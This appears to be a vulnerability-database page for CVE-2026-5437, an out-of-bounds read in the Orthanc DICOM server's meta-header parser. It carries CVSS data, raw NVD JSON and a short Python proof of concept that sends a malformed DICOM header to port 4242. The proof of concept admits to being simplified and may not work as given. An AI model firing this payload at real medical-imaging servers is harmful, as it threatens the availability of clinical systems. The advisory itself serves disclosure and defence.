Security Vulnerability Report
中文
CVE-2026-5437 CVSS 7.5 HIGH

CVE-2026-5437

Published: 2026-04-09 15:16:15
Last Modified: 2026-04-15 19:14:32
Source: [email protected]

Description

An out-of-bounds read vulnerability exists in `DicomStreamReader` during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE
Orthanc Server (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Proof of Concept for CVE-2026-5437 # Attempts to trigger out-of-bounds read in DicomStreamReader # Target: Orthanc Server (Default Port 4242) def generate_malformed_dicom(): # Standard DICOM preamble is 128 null bytes + 'DICM' # We modify the structure to potentially confuse the parser preamble = b'\x00' * 128 prefix = b'DICM' # Malformed meta header length or group length to trigger OOB read # This is a simplified example; actual exploitation requires specific layout malformed_meta = b'\x02\x00\x00\x00' + b'\xFF\xFF\xFF\xFF' return preamble + prefix + malformed_meta def send_exploit(host, port): payload = generate_malformed_dicom() try: print(f"[*] Sending payload to {host}:{port}") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.sendall(payload) s.close() print("[+] Payload sent successfully.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_host = "127.0.0.1" target_port = 4242 send_exploit(target_host, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5437", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:15.093", "lastModified": "2026-04-15T19:14:31.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read vulnerability exists in `DicomStreamReader` during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.11", "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"}]}]}], "references": [{"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.